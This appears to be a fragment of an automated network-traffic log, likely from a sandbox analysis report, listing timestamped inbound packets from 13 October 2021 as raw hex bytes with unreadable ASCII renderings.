bc 67 b7 7d 0d 89 63 10 cd 9e 61 b0 bd 98 b3 50 71 f3 33 4b de 98 60 20 42 e1 ba ed 41 cf be e0 fa 25 e9 cd f2 8d bb db 85 9e fe 56 5e 1b 00 96 e9 13 49 df a5 6a 1e 5f 1a 64 eb 7b 79 54 af d6 e3 8f 2a 33 bf 72 60 Data Ascii: E3>nqoo/]A@0g^5N'9quJg/\08:3Ud$+~uUV/(.-)mp{&?26jPx1~7W4}WKb?hKbd "B?w3J'eMzw%:4 Sg}caPq3K` BA%V^Ij_d{yT3r`
2021-10-13 13:52:00 UTC	429	IN	Data Raw: 6e ab 80 c2 de 78 1c 53 bb 4d ae e3 a5 29 de 71 b9 e9 8e 52 8c 41 c6 26 fc 3b 4e 6f b1 c1 31 00 a0 67 d6 01 59 14 f4 b8 d5 11 1f ce 0e 7b df 15 ad 5b eb 70 88 4c b5 99 04 5c 72 74 ac d4 06 80 30 5a da a8 db 52 44 02 38 bf 27 41 95 73 d4 2a 00 2f 5c 16 d7 68 da 79 1b 13 64 53 b5 06 73 e2 7d 59 4b 66 09 f6 07 c8 a8 05 c4 05 52 06 a8 b6 4e 39 3d f4 60 b6 80 be 6e b9 52 c3 56 3b df 67 38 99 8f 13 37 22 09 05 72 50 2a 0e 73 8a 7e 0d 65 b4 97 60 46 8b 43 ea 83 1b 6a 5a 8d 47 64 47 2e dc 98 43 77 91 cc 1d 19 63 59 b9 ea 78 ba 9c 5e ca 08 3b 79 af 06 aa 7b 6a 64 da c7 5f 19 7e dc a5 e4 54 d0 70 b4 eb 9f 3c 58 a5 a5 be 3a 3c 69 8a d2 5b 15 92 90 50 4e d9 a1 b9 20 a2 bc 3c 1a 7e 7f c8 4d 5f 63 a3 ed 76 48 5c 4f 2c 9e 89 5e b1 5e 40 a4 c8 c1 7c ea 87 51 cd 9d 9c 97 Data Ascii: nxSM)qRA&;No1gY{[pL\rt0ZRD8'As/\hydSs}YKfRN9=`nRV;g87"rPs~e`FCjZGdG.CwcYx^;y{jd_~Tp<X:<i[PN <~M_cvH\O,^^@\|Q
2021-10-13 13:52:00 UTC	431	IN	Data Raw: aa 66 f6 d7 77 69 31 e5 7b 4c 3b 77 16 5f 9d 72 8e a9 d5 c9 2a 96 1e dc 48 85 8f 09 e6 d8 34 d4 5a 8b 1d f4 82 6b c3 40 da 7c 3a 28 6f 5c 0d bd f8 0a f9 60 7e 81 ff df 24 7c 9b d1 48 7a 0c 31 5e 97 3b c5 c7 06 9b ed ba f9 5c 1d 05 35 7e 28 21 66 ac cb e5 6c 49 10 5a ab ba c4 8d 69 e1 54 96 f7 19 35 61 ca a9 b1 9a 59 df b0 5f d9 79 82 29 5c bd 6b 82 aa 13 49 32 90 59 ad 75 f5 ff f0 32 90 68 14 e2 d1 56 c2 3a 34 c1 e9 eb 31 b0 d1 67 96 ed e9 fd 44 42 10 d5 6c 74 a3 62 8d 2b f0 93 ed 78 87 f0 d6 b0 4e 64 75 b6 c8 26 9f 02 1d 4f 1b 88 f4 6a fc 6f 78 ca d2 52 06 ae 13 db 45 2c 46 6c 5a 17 5d b3 4f ac c0 ed f5 68 4c e1 05 33 b3 7d c3 79 07 5f b9 1f 06 e2 6a 91 2a 3c 05 df cb 07 b7 ff 04 6f 92 b9 3e 21 01 8d 68 03 c7 86 04 b7 6b 25 a8 65 6e cb 85 d9 1e df 3e ca Data Ascii: fwi1{L;w_rH4Zk@\|:(o\`~$\|Hz1^;\5~(!flIZiT5aY_y)\kI2Yu2hV:41gDBltb+xNdu&OjoxRE,FlZ]OhL3}y_j<o>!hk%en>
2021-10-13 13:52:00 UTC	432	IN	Data Raw: a6 85 b8 e1 46 99 fc 71 f0 51 cd 93 d5 6b 8b 9b 87 5a 39 18 7a 3c 78 44 75 c6 91 cc 7b 7c f7 f2 57 4c 4e 53 b5 de c3 36 aa 3f 9f 8c 65 98 b6 f1 15 41 53 99 40 12 a0 20 ee 99 49 d3 e7 6d dc a9 cd 64 c7 30 69 6a bb 95 60 08 d8 fc f4 91 7e ac 98 1f 4e fc 0f 1d 2a b5 14 91 d9 71 f0 f6 2d 72 f3 18 97 39 26 82 f0 3c a2 29 b2 54 53 53 97 dd ec a0 44 a9 f5 ec 62 7e 39 ff 18 a0 fe e8 7a 41 ec d8 63 96 37 74 c7 e7 8f a1 fa 1b fd 2b 84 b5 59 2a 09 b0 66 66 c3 8e 95 b6 b2 dd 7e 7f 0e 70 cb 62 70 38 5e a8 97 54 5c b1 e0 41 65 e6 ef df 18 3b cf aa 5d 66 70 68 5f c1 87 be 23 9b 86 e0 d0 38 0e 10 51 a2 f7 f1 6d 7a ff cf c3 5f 1f a1 71 bd d8 c3 a9 f5 cb 13 8f 0d ed b5 2c 8f 6a 79 8c ac a2 0d 41 6f d5 c8 0e cf 76 89 9d c8 1f 0e 30 89 3a ae e9 b4 4a 26 6b f1 aa 2e 07 99 2b Data Ascii: FqQkZ9z<xDu{\|WLNS6?eAS@ Imd0ij`~Nq-r9&<)TSSDb~9zAc7t+Yff~pbp8^T\Ae;]fph_#8Qmz_q,jyAov0:J&k.+
2021-10-13 13:52:00 UTC	433	IN	Data Raw: 6f b3 3a f4 be 52 3a 4f ad 5b 19 db 3e f0 db f7 11 d9 02 a7 e6 d3 b7 4b de aa 82 cf 90 07 eb 8b a8 b6 fe bf d6 98 a3 02 ab bb 89 fb ef 7e 77 dd ca b3 e7 99 1a 5f 85 d6 fa 66 90 f0 01 b2 78 cb 2a 84 75 63 47 59 f7 22 36 95 59 d6 22 92 a8 82 9f ca df 04 39 d2 ad c1 c3 03 3f d8 22 27 d3 a9 ef b3 9e d6 2a b7 40 71 5c d9 5a 10 8d 24 33 5d 65 dd a5 01 65 82 7c 51 3c cc 07 1b 1e b9 54 23 74 d0 c5 4a 66 09 8a 2b 4b bc 5b 4f 63 cb e5 11 79 42 21 3d a6 2a 63 68 eb 61 e7 d9 a5 cf f0 0d 04 08 47 fe f5 1d ff 09 56 00 9b 0d 1a 92 de e3 18 1a a1 10 74 e8 b1 ab 7a 7e 8e 95 54 04 af 6a 4b f5 6f 2d 27 00 85 b9 88 9d 7f 17 da a1 3c 31 d9 c5 ce 7f 24 23 15 42 ab 93 52 11 60 c0 5f 19 52 dc a5 e4 54 d0 70 10 00 d8 f0 39 56 2b f9 2a a3 0e 46 2e 05 9c c7 9c 56 48 06 cc a7 20 a2 Data Ascii: o:R:O[>K~w_fxucGY"6Y"9?"'@q\Z$3]ee\|Q<T#tJf+K[OcyB!=chaGVtz~TjKo-'<1$#BR`_RTp9V+F.VH
2021-10-13 13:52:00 UTC	435	IN	Data Raw: 1a e0 b9 ed f9 b7 41 1f 3f 62 3d 9a 96 24 42 e8 53 08 ca fc 29 64 63 d8 71 98 4f d7 2c 72 a6 d4 87 ac 4f f6 84 ab 86 5e e3 77 26 bc e1 52 32 b6 28 0a 84 54 ce 2e 26 1a 5d 9e 5f 4f 17 7d 9e bf 31 07 c1 64 fd 7e 13 84 f2 87 27 74 a3 3a 4c 0f 85 38 0e f8 a9 ff f4 e3 a9 74 fd b4 11 48 7c 0c c8 40 97 3b 75 09 81 dc 21 33 ba 55 83 9f e1 e1 fd 9f 64 e4 12 7a da ef ce df 38 7c 2a 56 7c a3 54 be 17 c5 2b 0b 4b 22 a6 99 5c 5e 9f b9 d8 a6 27 64 58 ee e6 54 51 43 9d 1e 95 90 ab 76 25 78 25 fc 95 65 80 36 af 47 e5 b1 72 10 e1 29 82 f6 1c 6b 5f 51 63 f2 47 84 59 43 ee dc 0d 85 55 de f1 93 12 fc fa 22 ae e7 cb c1 3d 9c e0 40 3c d8 2e 1b 34 a4 7f 1f 67 1a 61 4e 13 25 8c d3 07 d5 f7 25 4b 63 13 15 08 bf a6 56 9d b0 99 10 18 e1 05 33 4a 6d 4f 39 47 dd bf 19 de 43 2f 15 4b Data Ascii: A?b=$BS)dcqO,rO^w&R2(T.&]_O}1d~'t:L8tH\|@;u!3Udz8\|*V\|T+K"\^'dXTQCv%x%e6Gr)k_QcGYCU"=@<.4gaN%%KcV3JmO9GC/K
2021-10-13 13:52:00 UTC	436	IN	Data Raw: 58 fa 81 16 de 27 8e f1 89 b7 f7 a5 b5 01 83 92 5d 4f 16 70 0e ce 64 c4 cd d8 7b 02 a3 e3 f0 87 f6 fb 77 66 5c bb cd 57 d1 c0 30 c0 5c 8b 9c d9 2b 04 92 ac be 60 40 7a 9f 9a 42 03 ca 40 c6 86 21 70 3a b3 4a a1 43 3d 51 4c ad a8 71 95 d1 23 a8 4a 4f 3a bd f1 3a 07 17 d5 5a 8c 05 da ee ff 9f 9c f8 27 b2 45 b0 dc 11 e9 40 aa c4 a3 55 61 c5 f8 d4 69 09 e9 e5 5a f6 25 2a b5 23 30 29 92 29 eb 8d 48 60 45 1f 4b c7 2c d1 f3 0e 0b 9b 10 65 15 66 61 19 74 e0 be c8 8e 10 bb 20 60 e8 46 92 0f 20 36 f2 3a 4a 7f 2e 1e d5 9d 89 50 af b6 41 15 5c c2 ef 9c d7 e1 7c 7c 4c e6 57 3d b8 2c af b6 08 19 6b b2 17 3c ac c6 0b cd fa c5 67 6a dd 68 7d 6e d8 96 30 7f 57 32 2b ab 40 48 98 01 69 a5 31 aa c0 f8 65 9b 2e 75 70 f5 45 83 17 71 ab eb bf 2c 6a b2 82 66 20 e0 e0 0c 2b 67 1a Data Ascii: X']Opd{wf\W0\+`@zB@!p:JC=QLq#JO::Z'E@UaiZ%*#0))H`EK,efat `F 6:J.PA\\|\|LW=,k<gjh}n0W2+@Hi1e.upEq,jf +g
2021-10-13 13:52:00 UTC	437	IN	Data Raw: 7d 6c bb 13 69 6a d8 76 95 87 ab 28 b8 ac 0e 4f 49 52 75 22 11 32 9a 85 72 9d 83 84 a1 8f 39 95 35 b0 6e 57 88 e9 e8 8d c7 01 e8 38 6b aa d5 5b 01 a9 ff 05 86 28 bf e6 a1 b0 41 a3 27 ca 7a 90 20 30 d7 37 c9 ef 59 ab f0 c7 9a 97 3a 3f 9a 6a 07 7b 3c 5b 90 a0 36 02 5b c8 c1 8b 32 ed b1 61 f0 ee 07 01 12 39 95 d7 eb fa 74 93 a0 18 d9 52 74 85 22 32 b5 6c 7b ec 09 f1 63 a0 be 5d 55 1c 1f 3a cb ec e1 71 5f d4 77 f8 16 49 ed e6 f7 cb 65 1b 0c 8e bb 81 d5 c6 ea 7b 6d db 2b 9b 15 8f cf 4e 4a 67 8a 3a dc 7b 66 b3 87 75 b3 04 b1 e7 90 9b 2d 50 68 f6 27 29 6b a5 5c 0c 0e b4 31 6a d4 dc a1 44 9d 47 31 16 08 f6 35 9e 90 47 fc 27 cb 04 d8 95 f8 d6 8d c3 4e e1 f6 ec c2 8d 6c 55 e6 78 69 ca a5 27 bd 3d 32 8a 90 1a 3b 83 99 18 c0 f7 89 15 0c 75 7e f7 11 94 f6 00 83 ad 2a Data Ascii: }lijv(OIRu"2r95nW8k[(A'z 07Y:?j{<[6[2a9tRt"2l{c]U:q_wIe{m+NJg:{fu-Ph')k\1jDG15G'NlUxi'=2;u~*
2021-10-13 13:52:00 UTC	438	IN	Data Raw: 40 1f 57 c0 7f b9 b4 33 82 59 01 3c fa bb eb f0 10 a0 dc d6 78 b3 09 b7 87 27 c2 f2 4f 16 60 17 92 b5 e1 03 7b 76 4e be b0 31 2b d9 3d 36 85 98 80 98 0f e7 3c 5c 1b 00 37 2f 13 49 df a5 72 c6 8e f9 20 71 b2 0b a5 79 a0 59 84 1c ee 5b 76 9e a2 82 87 09 2f 34 d5 5a 8f dc 8b 9d 59 4c 22 92 dc c5 17 02 58 bf cf 26 65 86 f5 e1 f7 ad 97 a1 7b 07 7c d5 54 f5 b9 80 13 27 b4 09 23 ea e7 7c 69 cc d1 84 3b f6 59 6d b5 a9 3f 39 39 85 ae f0 32 e3 82 c4 d8 d1 ea f9 2a 6c ee df 08 bf 19 11 3e 5a 3b fe b7 98 59 1d 41 48 d2 09 52 78 37 b9 30 dc ed 0d 6d 22 d3 07 a9 a7 96 99 13 c7 74 14 77 f6 e2 88 c5 bc f5 3e 64 2a c2 44 f7 95 a2 8c 73 f5 97 e5 11 65 43 60 dd 55 29 b8 64 c9 21 09 8b 9b 92 87 aa f4 6b 5a e5 32 65 33 94 83 71 22 e4 ed 48 85 b9 79 ff 87 6c 88 3a 04 62 ef 0a Data Ascii: @W3Y<x'O`{vN1+=6<\7/Ir qyY[v/4ZYL"X&e{\|T'#\|i;Ym?992l>Z;YAHRx70m"tw>dDseC`U)d!kZ2e3q"Hyl:b
2021-10-13 13:52:00 UTC	440	IN	Data Raw: 33 fb 78 72 93 91 81 3b fe 88 e3 37 aa 82 25 cd 97 82 1d e8 f3 7a 28 9a 87 65 ee ba 4c b4 4e 2d 34 cc de 64 7a fe c8 e1 a7 33 d8 52 45 29 df 45 5d 6d 02 43 44 e8 ef c8 78 03 9d f5 3b 9b b4 86 be 95 67 b0 cf 77 df ee 3b 3c 18 8a f4 19 a2 19 bf b4 99 97 41 60 75 5b 9e f1 fa 21 fd 67 42 f7 29 a3 4c 0a e0 a9 fc 9e b5 55 66 a5 5e b1 f1 21 f7 bd 03 f2 c7 2c b1 ef cd b1 5a 2d f2 56 d6 2d 51 99 e6 08 94 f2 9b d5 9c bf bb 3c ab a9 44 3d 3f 01 6c d2 1b 5c 9c c8 42 1f ff 62 20 d5 2d 7f e6 c1 93 67 e5 9d b2 5a fa 1a fa 05 90 5c 3a 04 70 b2 28 fb 2c 28 4e ae 27 2a 8d b7 56 7e cb 8a ea 17 3c 28 da b0 40 e4 82 2a b8 3f 9d 00 e6 b5 78 4e 98 8b 3e 0d 71 73 cb 16 8a 6a 27 1c a4 37 8c 12 6f ed 22 f1 22 c0 b4 d0 de 05 12 04 77 a6 67 d2 57 bb 81 a5 87 1a 4a 9a 3b 7a 00 4e 46 Data Ascii: 3xr;7%z(eLN-4dz3RE)E]mCDx;gw;<A`u[!gB)LUf^!,Z-V-Q<D=?l\Bb -gZ\:p(,(N'V~<(@?xN>qsj'7o""wgWJ;zNF
2021-10-13 13:52:00 UTC	441	IN	Data Raw: ee 34 be 61 ea 57 7f 91 fc 53 f2 21 07 ae 10 8f d3 af 4a e8 04 44 b5 08 f0 52 cc 0a 07 7f 4d e1 8e 26 e9 7d cc fd c6 15 46 10 2a dd f2 7e af f6 40 e5 8b 09 cc 8b f4 14 57 e8 d6 16 bd 73 7a 87 d5 13 11 b7 6b f6 db f2 09 b0 52 27 4f 52 39 0e 50 74 17 dc 0d 11 21 0a ea 88 39 e6 f7 02 91 55 11 c0 8b b1 0e 09 af 8c 28 40 0d ad 1f 5e 60 ea 1e e5 26 62 94 2b 4d 8d a9 3f 9b 38 1b 96 98 75 c9 93 5a 07 ac 40 b7 a9 c8 56 84 08 97 03 66 f7 1e b4 9e 41 53 91 d8 ca c7 c0 c1 de 9a a7 29 24 04 04 00 cf 61 da a9 3c 07 86 52 ba 79 73 4e 18 54 28 f6 c8 78 17 ee d7 e5 97 d1 8f 07 19 16 5d ee 92 1a 38 a5 39 0c f6 f6 10 a4 b1 ed b1 a1 69 d9 a0 33 9f 7d 5e 7f 0c e0 68 bd b3 f4 fa 11 1f a6 80 ab 07 38 56 1e b1 d5 7d ec 95 95 40 f1 e6 74 70 8c d5 b4 f4 b9 8e 1e bc 0b 15 d5 7e d7 Data Ascii: 4aWS!JDRM&}F*~@WszkR'OR9Pt!9U(@^`&b+M?8uZ@VfAS)$a<RysNT(x]89i3}^h8V}@tp~
2021-10-13 13:52:00 UTC	442	IN	Data Raw: 4f 60 7c 85 8b b0 b0 f2 91 e2 92 0c 71 a4 41 3a ad cf b3 4a a4 b5 ad 5a 7f ee fb f8 b6 cd d0 f4 d5 57 ee f6 a6 44 34 20 50 8b 05 f9 6d f4 ea 37 55 07 3e c3 3e 2d 0b cd bf 89 8a 92 54 06 8b af 18 19 5b e2 66 80 e7 b9 41 1f ea f6 c5 fc f2 7a c9 8e ca c7 a5 b1 11 41 b9 20 fc cb be a3 9e 30 c5 80 a8 21 1b 73 03 f8 76 a2 59 f8 88 b4 e3 ea 30 64 7d 0a 07 13 cd 75 fb 85 da f8 04 8b 19 a9 2c bf 81 52 89 12 20 38 fe 8a 4e eb a0 f1 7a 77 d9 56 8c 29 c3 87 79 8f 88 b1 69 ce a9 24 40 93 c1 6f 37 1d f1 b8 8e 10 85 2b d7 b4 71 4b 05 3d bf bf 76 fa 4d 00 af 41 af c2 45 ea 54 e8 b7 95 25 38 8e cb 88 01 63 3a 8a 2c 78 ee 19 d1 37 bf 0a ce ce 99 05 ae 65 15 5a 7a df a8 6a 4e 6e 41 a2 ea 11 c0 65 22 9c 8e 09 70 9c 64 11 b0 3f a4 e5 00 45 60 4c c4 21 f2 c0 ec 54 29 ef 07 29 Data Ascii: O`\|qA:JZWD4 Pm7U>>-T[fAzA 0!svY0d}u,R 8NzwV)yi$@o7+qK=vMAET%8c:,x7eZzjNnAe"pd?E`L!T))
2021-10-13 13:52:00 UTC	443	IN	Data Raw: 3b 70 6a 8d 32 04 ef 6a af d6 d4 19 48 d5 c0 bf dd fa 24 8a 70 6f 49 99 4f 56 14 62 82 17 b0 78 52 cd 0b 60 0b 3f c7 ec ec 05 84 00 9e c9 d7 0f c6 bd 7c ad e4 49 65 c8 37 ea 52 84 b8 55 ba 34 6b 5f a5 c4 c1 a8 47 f8 90 6c 19 03 4e 41 35 8e 8c ab ed f5 39 ec 96 f1 a3 49 29 4e f0 ce 00 f9 be 46 e7 87 04 b9 f9 29 24 9f af 89 02 9b 47 9a 1e 06 d0 2d 6f a6 68 28 53 31 8f ae 7f cc ac c3 0b f3 9a e7 37 c5 fd b6 8f 18 ec 73 ba 42 f6 48 13 a1 99 55 07 27 d8 43 03 90 ac f1 11 bf 2e 9c ed f8 74 e7 c4 18 bb d2 af 07 fc e9 72 64 3b a1 15 ac 5b 78 83 3d 99 83 87 54 ee a8 1e 53 25 f8 7f f5 bf 86 58 ff 74 64 f6 fe 37 32 15 35 2f 92 59 2c 3a ed a0 44 5b 6e 90 33 a0 6b 3d 20 2d c6 ef 32 fe 7e 04 c3 80 ef c8 ae 48 cd a0 fa 90 e6 9c 6f 8e 55 a3 44 31 66 4e 49 20 e1 9a 8e 37 Data Ascii: ;pj2jH$poIOVbxR`?\|Ie7RU4k_GlNA59I)NF)$G-oh(S17sBHU'C.trd;[x=TS%Xtd725/Y,:D[n3k= -2~HoUD1fNI 7
2021-10-13 13:52:00 UTC	444	IN	Data Raw: 4e cc e5 11 9c 1a 70 b3 49 35 75 36 09 ef 5b d0 c5 92 0f d3 ea a4 33 e7 a5 f3 1b bb a5 91 8b b7 fc af c8 d7 cc d7 e4 97 4f 41 16 59 21 e8 6c 48 99 05 eb 90 ce 1a c1 d4 09 7a ac ff 10 cb c5 70 f9 ef 97 3f 40 ca 98 fb cb 8f 1b c3 c1 0b d3 de 18 20 7b f4 ef ff 68 85 d0 a7 3d e8 02 c6 ad 12 04 8b 58 7a 04 b2 35 f0 db a8 f4 51 f6 54 65 c1 29 f7 e2 41 17 1d b7 6d 91 11 57 17 19 e5 0a 92 19 2c ca 64 85 44 54 12 ff bb c4 9e 09 f7 c3 ed 76 c3 7c 7c cd e3 ef d5 dc d5 5f ac 2f 9d c0 b0 d3 b9 fd 0a 11 63 8d 9f ea d5 e0 13 f8 d9 25 02 e3 44 40 27 10 7f a5 91 58 07 31 94 3e ef 0b eb 83 96 43 72 9a 67 66 21 a2 2d 5e 93 bf 5f e8 2d 43 45 c2 de f3 36 4b 41 67 3e 38 cf 61 e7 57 97 62 bd 38 59 8d 1c f9 f3 45 33 c7 e9 7a 15 9c 45 6f e2 88 99 6e 55 71 6d 79 0e 67 05 ca d2 f9 Data Ascii: NpI5u6[3OAY!lHzp?@ {h=Xz5QTe)AmW,dDTv\|\|_/c%D@'X1>Crgf!-^_-CE6KAg>8aWb8YE3zEonUqmyg
2021-10-13 13:52:00 UTC	445	IN	Data Raw: 5e df 3c a9 79 30 a1 e7 03 3c 5d 82 0c 85 3a d5 11 db fd 30 df d0 44 aa 2d 67 e4 5c 18 69 95 8d 85 9a bc 9d 7b 78 7b 77 f3 f8 41 83 29 3e 49 7f 0b f7 ba a4 4f 97 cf 68 03 50 f9 ec cf 86 5d a0 64 a8 56 6d 09 d4 af c8 66 1e 24 25 6e d4 98 11 8e 91 3d f2 ea 66 1a a1 40 de 1c 65 b8 6e 88 4e 23 39 6d ac 44 d1 bd cf 4b 2f fb e9 37 b0 9b db 8a e6 99 ca 8b 1e fa da 49 3e 45 bb 43 b6 55 d9 7a e3 1b 9b f9 f6 42 d3 23 65 8f 1c f4 81 ae ef b7 67 92 9b ac ca bc 48 6f b0 3c 2f 10 6b 89 84 6b 27 e1 b5 b5 63 5e 32 0f 34 9d 3f 92 c9 69 4c 13 88 70 18 e0 42 80 7d 91 25 19 cb f9 81 7f c6 fd cd ea 09 25 d1 d9 e5 2c 65 90 20 cd 34 dd 00 5a c7 71 1a 0b f8 02 eb b7 3e 38 e9 a0 b8 e1 fe f2 c3 e2 43 b0 d9 03 75 f4 50 8f 8e 3a ea 2f bb 57 ac 28 65 6a 70 5a 10 d0 d8 2a 1c 56 4e 28 Data Ascii: ^<y0<]:0D-g\i{x{wA)>IOhP]dVmf$%n=f@enN#9mDK/7I>ECUzB#egHo</kk'c^24?iLpB}%%,e 4Zq>8CuP:/W(ejpZ*VN(
2021-10-13 13:52:00 UTC	447	IN	Data Raw: 58 25 fa bd 73 21 3c 1a 71 5a 8e 44 01 34 b7 39 73 6a 27 b7 01 d2 46 90 b4 42 90 ce df 6d fb 42 fd 93 ed 99 26 27 c0 32 ba 71 d7 64 24 04 e1 1d cb ba 19 f5 33 8a f5 5d a3 04 bc e3 c7 b7 ef 1e f0 de ee 76 d5 85 35 a5 31 66 1d f2 5f 8f 64 0c 7f ad b1 9b 88 6c e1 68 2f 46 cf a1 e3 f3 76 6f 18 72 c8 43 f8 8f f3 f4 b3 c3 61 65 49 4c ec bb f3 fa b0 0e 10 54 7a 40 54 3a c0 7f bf 76 1b 8d 05 fd 3f 2c 87 87 b2 eb c1 91 87 2a d8 18 9b 02 fc 3d 91 da 18 d9 13 e0 de b9 eb 25 3f 4e 35 a5 b4 25 e9 81 9b 2a 21 d6 f3 34 09 d4 5a 57 e8 ad e2 5d 5d 0c 36 33 c5 02 b7 21 1b 75 d3 dc 0a 1b b2 f0 31 40 db 12 c9 5d 7d 58 87 10 99 c2 31 fa 51 1d d2 06 58 a9 85 3c 59 ce 0d 58 1c 0b 3e 5d d7 77 0c 87 d7 90 df 40 d0 7f 6b 7b a5 fd 7f 67 e4 21 a1 8f fd 15 33 1b 8d 96 53 37 a5 e6 31 Data Ascii: X%s!<qZD49sj'FBmB&'2qd$3]v51f_dlh/FvorCaeILTz@T:v?,=%?N5%!4ZW]]63!u1@]}X1QX<YX>]w@k{g!3S71
2021-10-13 13:52:00 UTC	448	IN	Data Raw: bf 5c 4a 70 ac 9b 46 be 5a 4b b0 a9 e0 cf 9e e6 59 bf 4d 18 48 d6 7c 6a 56 e8 92 bb c7 e3 9f 75 57 58 13 97 a1 54 23 da e9 fb e9 5a 3a c5 ba d0 0f 8e 81 8e 1d 6e 3d 20 5d 3f dc e3 63 6d d8 05 35 b9 52 16 c2 db a4 45 f8 c7 8f a3 7a 6a c7 1f 93 1e c3 ca 0d d9 a3 b7 40 ba 41 e6 76 2d 16 0b 6f fa 2f df 4b f7 25 43 14 99 1a e4 6d 1c 7c 7a 1d 32 0f 07 a4 c0 4e 8c d5 9f 7f 3c 33 cc 57 e2 f0 27 fb 1c fb c8 8f c9 d6 eb 3f 3a c8 bf 7d 9e a3 bc e2 fc e2 2c 32 74 08 59 56 71 42 ac c5 8d f5 df 61 49 56 15 53 02 78 68 15 c8 4c 3a 17 3a e6 76 c3 5f 0f 4f 57 95 d5 b6 5e 60 bc 29 8d 18 69 8b d2 09 04 43 33 f1 8a ac 01 a5 8f 3d 8c ae 6b a8 0e cc a3 59 6f f3 70 08 7d b1 fd b3 2b df 6d 27 b2 15 22 72 e3 f7 19 af ac 06 81 40 12 bc 26 36 55 34 e8 0c 6d 07 14 6b 6e b3 c9 b3 75 Data Ascii: \JpFZKYMH\|jVuWXT#Z:n= ]?cm5REzj@Av-o/K%Cm\|z2N<3W'?:},2tYVqBaIVSxhL::v_OW^`)iC3=kYop}+m'"r@&6U4mknu
2021-10-13 13:52:00 UTC	449	IN	Data Raw: 6c e1 8e 9e 5d 21 b5 f9 1b c5 6b 09 df db 02 26 c1 db 98 fa 4e 12 ea fd 96 b2 62 26 33 e7 d2 13 c0 07 9d 3c 8c b4 03 e3 cf 03 48 31 59 a2 8d bd 9a 09 d9 a0 a7 02 b1 d7 66 40 fa 65 13 42 13 95 8f 89 43 26 30 72 76 f0 79 22 68 bc db 32 6f 01 51 eb 92 c1 36 15 de 83 84 91 04 e0 76 0c d9 03 43 c7 e6 5c 3c 84 3b b1 9f ed fb 2f b6 4a fc c6 9a 62 49 3e 91 ea 5e 22 40 0c a5 77 ae 6b c3 fc 90 7e 65 8c eb 37 09 30 6a 69 ba 8f 43 41 e3 47 17 d4 b3 fa 70 59 b3 8e e5 5d 39 47 b8 47 0f 32 11 d7 4c 8e 4f f0 22 c7 41 ec d0 e9 4d 69 49 53 ab 2d 0e 31 7a 6f 59 c8 5b 8e f2 63 2d 1e 6f 37 25 84 b2 1e 8e 30 84 93 78 17 dc 0b a9 85 b2 e1 88 53 69 2f 63 e2 41 b4 1e 6e c7 65 f0 87 de a3 1a 9b b9 89 eb ff 7f ad c2 3a 60 92 33 f1 8c ca 83 b5 69 90 58 50 23 cf d1 0f fe 01 c4 01 8f Data Ascii: l]!k&Nb&3<H1Yf@eBC&0rvy"h2oQ6vC\<;/JbI>^"@wk~e70jiCAGpY]9GG2LO"AMiIS-1zoY[c-o7%0xSi/cAne:`3iXP#
2021-10-13 13:52:00 UTC	451	IN	Data Raw: f6 f5 27 20 18 3f da 11 8f 0f 3f cf e2 ac 06 d4 60 bd 3c b8 ac 12 ba 3b 0e 53 38 68 a9 c5 1f c1 5d 28 0d d8 71 e5 38 1b 20 8d bd fb 92 78 a5 34 8a a6 74 a4 d9 14 1d 93 87 a2 15 a4 7e bb 64 fb 36 a8 48 48 13 aa 72 cc 32 6d 3d 5e 62 a7 eb b4 bf 5e 2a ce ed 08 ae 08 b7 6a db 17 b3 16 e2 54 f2 7b cb 6f b8 6d 02 26 c7 58 37 c0 aa 51 a2 64 0c a2 b0 a9 26 da 64 8b a3 12 52 74 e4 f3 29 51 63 c9 3f 9e 09 9b c4 87 a5 4c 98 79 2c 62 5c 79 57 78 ef 33 c3 40 0f 7c c2 bb 4f 4d cf b4 29 03 06 1e 51 d4 7f 78 ef a2 73 94 81 5d 3d 3c 46 b1 81 38 a6 85 92 6c 45 b5 30 89 d4 32 7a 07 1b 35 0c 37 e3 25 4a 81 76 9f 67 0f 9a 7b 8c 30 40 e8 ad 3f 43 a1 8a 67 62 2d 22 c6 39 90 bb 92 ab cc 4d 25 bf 5c ea 38 57 d6 0d f6 0c d5 85 36 fa fb 83 92 e0 48 54 99 2e af 94 64 d9 31 42 13 5e Data Ascii: ' ??`<;S8h](q8 x4t~d6HHr2m=^b^*jT{om&X7Qd&dRt)Qc?Ly,b\yWx3@\|OM)Qxs]=<F8lE02z57%Jvg{0@?Cgb-"9M%\8W6HT.d1B^
2021-10-13 13:52:00 UTC	452	IN	Data Raw: e6 03 c3 67 ad f0 7d c7 5c 51 81 63 48 5f b2 ad f2 94 52 93 c9 6b f5 4c 9e d1 98 87 44 21 b2 37 57 13 d6 1d 27 79 88 dd 0d 6d 99 ca a3 cd 78 1f 66 24 cd 14 f0 28 6b a3 97 00 63 6c e2 80 e3 a7 71 b6 5d c6 04 5d aa 8d da c7 cf b8 cf a1 e1 4c a5 1c fa ae 8b c0 71 c5 ec c9 d2 49 89 3c b6 3f 05 af 47 ad bf f8 3c d6 03 10 4f fa 09 95 8b 92 45 4f f8 3f f0 e6 74 70 8c d9 8e 0d 73 ed 09 30 7e 7c 8e 00 c5 96 e8 dd 7f 80 75 8f 8e 2f c7 9b 7e 77 cc f0 ae 9e 3c ec cb 3d c7 0a 96 d0 2d 07 ac 2c 82 a0 61 c0 23 b7 54 d5 ac 87 f7 73 4c d3 96 69 a6 d8 14 65 25 87 8d 7b f4 c1 3d 0f c4 c7 ee 28 aa db be b7 44 15 03 fa 54 81 37 e2 dd bd 9c ba 9e dc f7 a0 58 89 9e 83 e1 3d 23 52 5d 37 7e fe d3 06 25 1d ef 9c f1 d8 36 14 0c 5e a7 8e cd 86 dd b4 3b 42 0f 29 f2 f2 e5 ea 4e 53 54 Data Ascii: g}\QcH_RkLD!7W'ymxf$(kclq]]LqI<?G<OEO?tps0~\|u/~w<=-,a#TsLie%{=(DT7X=#R]7~%6^;B)NST
